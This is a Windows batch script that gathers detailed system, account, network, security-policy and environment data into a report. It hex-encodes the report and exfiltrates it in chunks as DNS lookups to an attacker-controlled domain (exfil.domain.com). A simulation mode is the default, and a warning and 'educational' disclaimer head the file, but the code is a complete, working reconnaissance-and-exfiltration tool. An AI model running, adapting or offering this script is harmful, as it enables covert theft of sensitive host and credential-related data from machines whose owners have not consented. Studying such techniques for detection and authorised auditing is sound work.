@echo off
chcp 65001 >nul
setlocal EnableDelayedExpansion

REM ==========================================================================
REM System Information Gathering and DNS Exfiltration Script
REM Author: Jacques Gariépy
REM Date: %DATE%
REM ==========================================================================
REM
REM                           *** IMPORTANT WARNING ***
REM
REM This script performs data exfiltration techniques (DNS exfiltration).
REM This method is often used by malicious actors.
REM Ensure you have EXPLICIT AUTHORIZATION before running this script
REM and that you understand the implications.
REM Use is entirely at your own risk. You are responsible for:
REM   1. Obtaining necessary permissions.
REM   2. Complying with all applicable laws and policies.
REM   3. Configuring the receiving DNS server for the specified domain.
REM
REM ==========================================================================
REM
REM                      *** EDUCATIONAL NOTE ***
REM
REM The system information gathering and DNS exfiltration script previously
REM provided is intended for purely educational and demonstrative purposes.
REM It illustrates techniques that can be used both for legitimate security
REM audits (with explicit authorization) and for malicious purposes.
REM Using such techniques without authorization is illegal and unethical.
REM Running this script is at the user's own risk, and the user is
REM responsible for ensuring they have the necessary permissions and
REM comply with all applicable laws and policies. This script should
REM not be used in a production environment without a thorough risk
REM assessment and formal authorization.
REM
REM ==========================================================================
REM
REM This script must be run as an administrator!
REM (Right-click -> Run as administrator)
REM
REM ==========================================================================

REM ---------- PARAMÈTRES ----------
set "MODE=/sim"
set "DOMAIN=exfil.domain.com"
set "SEG_SIZE=62"

REM ---------- VALIDATION DU MODE ----------
if /i not "%MODE%"=="/sim" if /i not "%MODE%"=="/real" (
    echo [ERREUR] MODE invalide : "%MODE%". Choisir /sim ou /real.
    exit /b 1
)

REM ---------- DATE ----------
for /f "tokens=2 delims==" %%I in ('wmic os get LocalDateTime /value 2^>nul') do set "NOW=%%I"
if not defined NOW (
    for /f "delims=" %%I in ('powershell -NoLogo -NoProfile -Command "(Get-Date).ToString(\"yyyyMMddHHmmss\")"') do set "NOW=%%I"
)
set "YYYYMMDD=%NOW:~0,8%"

REM ---------- FICHIERS ----------
set "OUT=%USERPROFILE%\Desktop\Security_Report_%COMPUTERNAME%_%YYYYMMDD%.txt"
set "HEX=%TEMP%\report_%RANDOM%.hex"

echo [*] Report Creation...

(
    echo Report generated by: %USERNAME%
    echo Date and Time: %DATE% %TIME%
    echo Machine: %COMPUTERNAME%
    echo ================================================================
    echo.

    echo [*** START OF INFORMATION GATHERING ***]
    echo.

    echo [Section 1] User and Machine
    echo Current Directory: %CD%
    echo User Domain: %USERDOMAIN%
    echo Logon Server: %LOGONSERVER%
    whoami /all
    echo.

    echo [Section 2] OS and Hotfixes
    if exist "%SystemRoot%\System32\wbem\wmic.exe" (
        systeminfo
        echo.
        echo [Hotfixes]
        wmic qfe list full /format:list
    ) else (
        powershell -NoLogo -NoProfile -Command "Get-ComputerInfo | Out-String"
        echo.
        powershell -NoLogo -NoProfile -Command "Get-HotFix | Format-List *"
    )
    echo.

    echo [Section 3] Installed Software
    if exist "%SystemRoot%\System32\wbem\wmic.exe" (
        wmic product get Name, Version, Vendor, InstallDate
    ) else (
        powershell -NoLogo -NoProfile -Command ^
            "Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName,DisplayVersion,Publisher,InstallDate | Format-Table -Auto"
    )
    echo.

    echo [Section 4] Network
    ipconfig /all
    echo.
    netstat -anob
    echo.
    netsh advfirewall show allprofiles
    echo.
    net share
    echo.

    echo [Section 5] Processes and Services
    tasklist /svc
    echo.
    sc query state= all
    echo.

    echo [Section 6] Accounts and Local Security
    net user
    echo.
    net localgroup administrators
    echo.
    net accounts
    echo.
    del /q SecPol.cfg
    secedit /export /cfg SecPol.cfg /quiet
    if exist SecPol.cfg type SecPol.cfg
    echo.

    echo [Section 7] Scheduled Tasks
    schtasks /query /fo LIST /v
    echo.

    echo [Section 8] Environment Variables
    set
    echo.

    echo [Section 9] Hardware Devices
    wmic path Win32_PnPEntity get Caption, DeviceID
    echo.

    echo [Section 10] Group Policies
    gpresult /z
    echo.

    echo [Section 11] Quick App List
    wmic product get Name,Version
    echo.

    echo [*** END OF INFORMATION GATHERING ***]
    echo ================================================================
) >"%OUT%" 2>&1

echo [*] Encodage hexadécimal…
certutil -encodehex "%OUT%" "%HEX%" >nul
if errorlevel 1 (
    echo [ERREUR] CertUtil a échoué
    goto CLEAN
)

echo [*] Exfiltration DNS %MODE%…
set "BUF="
set /a LINES=0
for /f "usebackq tokens=2-17" %%A in ("%HEX%") do (
    set "LINE="
    for %%X in (%%A %%B %%C %%D %%E %%F %%G %%H %%I %%J %%K %%L %%M %%N %%O %%P) do (
        if "%%X" neq "" set "LINE=!LINE!%%X"
    )
    set "BUF=!BUF!!LINE!"
    set /a LINES+=1
    if !LINES! geq 10 (
        call :SendSeg "!BUF!"
        set "BUF="
        set /a LINES=0
    )
)
if defined BUF call :SendSeg "!BUF!"
echo [*] Exfiltration terminée.

:CLEAN
echo [*] Nettoyage…
del /q "%HEX%" 2>nul
del /q SecPol.cfg 2>nul
echo Rapport final : "%OUT%"
pause
exit /b


REM --------------------------------------------------------------
REM  :SendSeg  –  découpe et envoie (ou simule) les labels DNS
REM --------------------------------------------------------------
:SendSeg
setlocal EnableDelayedExpansion
set "DATA=%~1"
set "POS=0"
:LOOP
set "SEG=!DATA:~%POS%,%SEG_SIZE%!"
if "!SEG!"=="" goto END
if /i "%MODE%"=="/sim" (
    echo     [SIM] !SEG!.%DOMAIN%
) else (
    nslookup "!SEG!.%DOMAIN%" >nul 2>&1
)
set /a POS+=SEG_SIZE
goto LOOP
:END
endlocal
goto :eof
